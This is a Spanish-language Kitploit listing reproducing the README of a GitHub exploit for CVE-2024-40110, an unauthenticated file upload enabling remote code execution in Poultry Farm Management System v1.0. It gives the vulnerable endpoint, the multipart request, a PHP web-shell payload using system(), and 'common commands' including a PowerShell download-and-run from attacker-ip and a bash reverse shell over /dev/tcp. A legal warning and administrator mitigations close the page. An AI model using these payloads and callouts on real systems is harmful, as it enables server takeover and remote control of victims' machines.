Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40110 — Exploit para CVE-2024-40110, una subida de archivos no autenticada que permite ejecución remota de código (RCE) en Poultry Farm Management System v1.0. Sube un shell PHP para ejecutar comandos arbitrarios en el objetivo. | Kitploit
Herramientas/GitHubGitHub/angry-althaf/cve-2024-40110
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Exploit para CVE-2024-40110, una subida de archivos no autenticada que permite ejecución remota de código (RCE) en Poultry Farm Management System v1.0. Sube un shell PHP para ejecutar comandos arbitrarios en el objetivo.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
3hace 9 mesesAún no revisado
Compartir

Sistema de Gestión de Granja Avícola v1.0 - Exploit RCE

Tipo de Vulnerabilidad

Carga de Archivos No Autenticada con Ejecución Remota de Código

Descripción

El Sistema de Gestión de Granja Avícola v1.0 contiene una vulnerabilidad crítica en la funcionalidad de carga de productos. La aplicación no valida ni sanitiza adecuadamente las cargas de archivos, lo que permite a atacantes subir archivos PHP disfrazados como imágenes de productos. Estos archivos PHP subidos pueden ejecutarse para lograr una ejecución remota de código.

Endpoint Vulnerable

POST /paultry/farm/product.php o POST /farm/product.php

Vector de Ataque

La vulnerabilidad puede explotarse mediante:

  1. Enviar una solicitud POST al endpoint de carga de productos
  2. Subir un archivo shell PHP con comandos arbitrarios
  3. Acceder al archivo subido para ejecutar los comandos incrustados

Requisitos

Prerrequisitos

  • Python 3.7+
  • Biblioteca requests
  • Biblioteca colorama (para salida coloreada)
  • Acceso de red al objetivo vulnerable

Instalación

pip install requests colorama

O instalar todas las dependencias:

pip install -r requirements.txt

Uso

Uso Básico

Ejecutar el script de forma interactiva:

python exploit.py

El script le solicitará:

  1. Dirección IP del Objetivo - La dirección IP del servidor vulnerable
  2. Puerto del Objetivo - El número de puerto (por defecto: 80)
  3. Comando a Ejecutar - El comando del sistema a ejecutar en el objetivo

Ejemplo

==================================================
Herramienta Interactiva de Carga de Backdoor
==================================================

Ingrese la dirección IP del objetivo: 192.168.1.100
Ingrese el puerto del objetivo (por defecto: 80): 8080
Ingrese el comando a ejecutar (por defecto: payload powershell):
Comando: whoami

==================================================
CONFIRMACIÓN
==================================================
URL del objetivo: http://192.168.1.100:8080
Comando: whoami
¿Desea continuar? (sí/no): sí

Características

✅ Entrada Interactiva - Solicita IP, puerto y comandos personalizados
✅ Valores por Defecto - Valores predeterminados convenientes
✅ Salida con Código de Colores - Salida de terminal fácil de leer con colores
✅ Paso de Confirmación - Verificar configuraciones antes de ejecutar
✅ Manejo de Errores - Mensajes de error elegantes para solicitudes fallidas
✅ Comandos Flexibles - Soporte para cualquier comando de shell o payload de PowerShell

Comandos Comunes

Objetivos Windows

powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Objetivos Linux

bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Recopilación de Información

whoami
id
ifconfig
hostname
pwd

Detalles Técnicos

Cómo Funciona

  1. Carga de Archivo: Envía una solicitud POST con un payload PHP incrustado como archivo
  2. Ejecución del Payload: El archivo PHP subido se almacena en /assets/img/productimages/
  3. Ejecución de Comandos: Acceder al archivo PHP desencadena la ejecución de comandos mediante la función system()
  4. Recuperación de Salida: El script obtiene la salida mediante una solicitud GET

Estructura de la Solicitud

POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Formato del Payload

<?php system('COMANDO_AQUÍ');?>

Entorno de Pruebas

El exploit fue probado en:

  • SO: Windows 10
  • Servidor: XAMPP v3.3.0
  • Versión PHP: Compatible con PHP 5.6+

Aviso Legal

⚠️ ADVERTENCIA LEGAL

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal.

  • Utilice este exploit solo en sistemas de su propiedad o sobre los que tenga permiso explícito por escrito para realizar pruebas
  • Los autores no asumen ninguna responsabilidad por el mal uso o los daños causados por esta herramienta
  • Los usuarios son responsables de garantizar el cumplimiento de todas las leyes y regulaciones aplicables
  • El acceso, modificación o interrupción no autorizados de sistemas informáticos constituye un delito federal según la Computer Fraud and Abuse Act (CFAA) y leyes similares en todo el mundo

Mitigación

Para Administradores

  1. Actualizar el Software - Aplicar parches de seguridad si están disponibles

  2. Validación de Carga de Archivos

    • Validar extensiones de archivo (lista blanca: jpg, png, gif, etc.)
    • Verificar tipos MIME en el lado del servidor
    • Almacenar archivos subidos fuera de la raíz web
    • Deshabilitar la ejecución de scripts en directorios de carga
  3. Configuración

    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Control de Acceso

    • Implementar autenticación antes de permitir cargas
    • Validar permisos de usuario
    • Agregar limitación de velocidad
  5. Monitoreo

    • Monitorear directorios de carga en busca de archivos sospechosos
    • Registrar todos los intentos de carga
    • Implementar verificación de integridad de archivos

Referencias

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Software Original: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Solución de Problemas

Conexión Rechazada

Error: Conexión rechazada
Solución: Verifique que la IP y el puerto del objetivo sean correctos y que la aplicación esté en ejecución

404 No Encontrado

Error: Fallo al subir el shell. Código de estado: 404
Solución: La ruta del endpoint puede diferir. Rutas comunes: /farm/, /paultry/farm/

PHP No Ejecutado

Error: La salida del comando está vacía
Solución: La ejecución de PHP puede estar deshabilitada o el archivo no se subió correctamente

Soporte

Para problemas, preguntas o mejoras, consulte el repositorio de GitHub o la página de Exploit-DB.


Última Actualización: Diciembre 2024
Estado: Verificado y Probado

Descargar herramienta